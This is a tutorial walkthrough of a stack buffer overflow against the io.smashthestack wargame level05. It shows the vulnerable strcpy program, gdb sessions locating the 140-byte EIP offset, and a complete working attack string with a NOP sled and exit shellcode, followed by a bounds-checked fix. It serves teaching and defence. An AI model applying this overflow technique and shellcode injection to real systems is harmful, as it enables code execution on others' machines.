This is a continuation of my previous article on Stack Overflows - Basics of EIP Overwrite. I suggest a glance over it before reading further. Again in this article we'll be using a vulnerable program to demonstrate our attack. Our main motive is to change the direction of the vulnerable program and make it do what we want it to do. In this article I am bringing the exploitation to a new level: we'll be exploiting a simple wargame level, and I'll be exploiting this code on their machine only.

Exploiting Code:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buf[128];

    if(argc < 2)
        return 1;

    strcpy(buf, argv[1]);
    printf("%s\n", buf);

    return 0;
}

I'll be using a basic exit shellcode for demonstration purposes, but any shellcode of a reasonable size can be used to exploit this program. So let's wear our grey thinking hats and get started.

Basically, to exploit this program we have to overwrite the EIP register. We have already learnt how to do that in the previous tutorial, so I'll not be repeating it here. Now what we want is to overwrite the EIP and make it point to our shellcode, which hands control of the program over to us.

So let's first ssh to their machine:

Code:
aneesh@aneesh-laptop:~$ ssh level5@io.smashthestack.org -p2224
level5@io.smashthestack.org's password:

   ______   _____
  /\__  _\ /\  __`\
  \/_/\ \/ \ \ \/\ \      Levels are in /levels
     \ \ \  \ \ \ \ \     Passes are in ~/.pass
     \_\ \__\ \ \_\ \
     /\_____\\ \_____\    Server admin: beach (beach@smashthestack.org)
     \/_____/ \/_____/    Server janitor: bla

1. No DoS, local or otherwise
2. Do not try to connect to remote systems from this box
3. Only two connections per IP are allowed
4. Quotas are in place so don't waste resources
5. This rules list is not all inclusive and is subject to change
6. Have fuN++ (28 levels)

- use long(>5char) names in /tmp, short stuff is periodically deleted, as are easily guessable ones
- o and feel free to leave your email in /home/email.list (it's writeonly)
- Thanks everybody for the new translations!

level5@io:~$
level5@io:~$ cd /levels/
level5@io:/levels$ ls
beta           level06_alt       level10       level16        level23.c
level01        level06_alt.c     level10.c     level16.c      level24
level02        level06_alt.pass  level11       level16.pass   level24.c
level02_alt    level06.c         level11.c     level17        level25
level02_alt.c  level07           level12       level17.c      level25.c
level03        level07_alt       level12.c     level18        level26
level03.c      level07_alt.c     level12.pass  level18.c      level26.l
level04        level07.c         level13       level18_cross  level26.y
level04.c      level08           level13.c     level19        level27
level05        level08_alt       level14       level19.c      level27.c
level05_alt    level08_alt.cpp   level14.c     level20        level27.pass
level05_alt.c  level08.c         level15       level21        level28
level05.c      level09           level15.c     level22        level28.c
level06        level09.c         level15.pass  level23
level5@io:/levels$ cat level0
level01        level04.c      level06_alt.c     level08
level02        level05        level06_alt.pass  level08_alt
level02_alt    level05_alt    level06.c         level08_alt.cpp
level02_alt.c  level05_alt.c  level07           level08.c
level03        level05.c      level07_alt       level09
level03.c      level06        level07_alt.c     level09.c
level04        level06_alt    level07.c
level5@io:/levels$ cat level05
level05        level05_alt    level05_alt.c  level05.c
level5@io:/levels$

Note: I'll not be revealing the password for this level as it's not allowed.

Let's now run it in GDB and exploit it:

Code:
level5@io:/levels$ gdb ./level05
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb)

Now let's place a breakpoint at the beginning of the program and run it.

Code:
(gdb) break main
Breakpoint 1 at 0x80483bd

Let's just run it with an argument of 160 A's. We'll be using basic python code to make our attack-string (input).

Code:
(gdb) run `python -c 'print"\x41"*160'`
Starting program: /levels/level05 `python -c 'print"\x41"*160'`

Breakpoint 1, 0x080483bd in main ()

Now just step through the program and see what happens.

Code:
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0x41414141 in ?? ()
(gdb)

OK, it's pretty obvious that we have overwritten the EIP with 0x41414141 (GDB reports that it cannot access memory at that address, because 0x41414141 is an arbitrary address that is not mapped in the program's user space, so the program cannot jump to it). Now let's try a few different inputs to get a basic picture of what's happening.

Code:
(gdb) run `python -c 'print"\x41"*140'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Cannot access memory at address 0x41414145
(gdb)

So, can you feel something now? Basically it means that to overwrite EIP with our desired address we end up with the following attack-string:

Code:
[Garbage string]  [EIP]
       |            |
  Should be 140   The desired
  chars long      address overwrite

Let's test it:

Code:
(gdb) run `python -c 'print"\x41"*140+"\x42"*4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
0x42424242 in ?? ()

Boom. We have total control over the EIP overwrite. Now we need to inject our shellcode and point EIP to it. Let's first look at where our data goes.

Code:
(gdb) run `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCC
0x42424242 in ?? ()
(gdb) x/10bx $esp
0xbfffdc80:     0x43    0x43    0x43    0x43    0x43    0x43    0x43    0x43
0xbfffdc88:     0x43    0x43
(gdb)

OK, so from the above we conclude with the following attack-string:

Code:
[Garbage string]  [EIP]          [ESP]
       |            |              |
  Should be 140   The desired    The desired data
  chars long      address        to enter in esp (stack)
                  overwrite

So we have a large amount of data space at ESP. We can just fill it with our shellcode and overwrite the EIP with its address. Let's do it! We'll again be using the same exit shellcode made in our previous article.

Code:
(gdb) run `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������1��#1۳̀
0xbfffdc80 in ?? ()
(gdb) continue
Continuing.

Program exited with code 07.
(gdb)

Woah! We did it. Now the explanation of the attack-string:

Code:
"\x41"*140 + "\x80\xdc\xff\xbf" + "\x90"*10 + "\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"
     |               |                |                       |
  Garbage     Hard-coded address   [NOP-SLED]         The exit shellcode
  string      of esp in little-
              endian format

The NOP-sled is simply a run of \x90 (nop) instructions; this instruction does nothing at all. We used it to make our attack-string more reliable, because with every new execution of the program the stack address changes somewhat. If we were not using the nop sled, our attack-string would fail.

That's all for this article. Stay tuned for more.
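For the defensive side of the same level, here is the level05 program with the unbounded strcpy() replaced by a length-checked copy. This is an added example, not code from the original article or from the io wargame; the helpers safe_copy and try_len are my own names. It keeps the 128-byte buffer and the argc check from the level05 source, and try_len rebuilds the "160 A's" style inputs used above so the boundary can be checked without a debugger.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the original article or from the io wargame.
 * safe_copy() is a hypothetical helper: it copies src into dst only if the
 * whole string, NUL included, fits in dstsz bytes. It returns 0 on success
 * and -1 when the input would overflow, which is the case the 140-plus-byte
 * attack-strings above exercised against strcpy(). */
int safe_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;

    /* Measure src, but never look further than dstsz bytes into it. */
    while (n < dstsz && src[n] != '\0')
        n++;

    if (n == dstsz)              /* no terminator within dstsz: too long */
        return -1;

    memcpy(dst, src, n + 1);     /* n < dstsz, so the NUL fits as well */
    return 0;
}

/* Boundary check helper: builds a string of len 'A's (like the
 * python -c 'print "\x41"*len' inputs in the article) and tries to copy it
 * into a 128-byte buffer the way level05 does. Returns safe_copy()'s result. */
int try_len(size_t len)
{
    char src[256];
    char buf[128];

    if (len >= sizeof src)
        return -2;               /* outside what this helper models */
    memset(src, 'A', len);
    src[len] = '\0';
    return safe_copy(buf, sizeof buf, src);
}

/* Same shape as level05, with the unbounded strcpy() replaced. */
int main(int argc, char **argv)
{
    char buf[128];

    if (argc < 2)
        return 1;

    if (safe_copy(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof buf - 1);
        return 2;
    }

    printf("%s\n", buf);
    return 0;
}
```

With 127 A's the copy succeeds; with 128, 140 or 160 A's it is refused before anything reaches the saved EBP or the return address at offset 140. Building with -fstack-protector and running with a non-executable stack would also break this particular chain (the NOP sled and the hard-coded ESP address rely on their absence), but those are mitigations; the bounds check is the actual fix.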